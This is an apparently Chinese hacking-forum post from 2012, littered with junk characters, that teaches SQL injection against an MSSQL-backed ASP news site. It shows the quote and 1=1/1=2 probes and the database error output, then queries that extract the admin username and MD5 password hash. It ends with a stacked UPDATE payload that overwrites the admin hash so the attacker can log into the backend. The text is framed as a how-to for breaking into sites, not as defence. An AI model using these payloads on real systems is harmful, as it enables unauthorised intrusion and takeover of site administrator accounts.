经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
4 T# P$ X* C% R可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)) n/ m) E; F+ P# K; V
测试如下:
( n Y7 H0 s5 b: K) }1 Jhttp://www.tmdsb.com/news.asp?id=121; _! O* ^# G u; s. v
在地址后输入单引号,显示9 W r! A) a$ T- V, _
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
9 m$ U8 D2 r, K& M9 m字符串 ’’’ 之前有未闭合的引号
) k3 q7 q% ?1 ~3 i/ y" h/news/tmdws.asp,行63! @6 R4 g \3 E% }5 ~/ |
说明没有过滤单引号且数据库是MSSQL.7 |. T u- W, j& o& h: D
and 1=1正常。and 1=2出错。肯定存在注入- i9 }# I' v1 G& Y
接着输入
9 J* e; B) y" w5 C. N: Ihttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
% f: U; J8 B1 g) K得到帐号为:admin2 |0 W( Y- P T; M( ^
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)2 K4 q* D8 D. l3 }7 r9 k: _
得到密码为:a4716077c2ba075c$ _' _7 a" R& Q2 v9 H
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433' T4 w7 i: f# l; _
命令如下 :
/ k9 C8 {* i) Z* ?;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–! |/ W$ a: z2 Q8 k
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41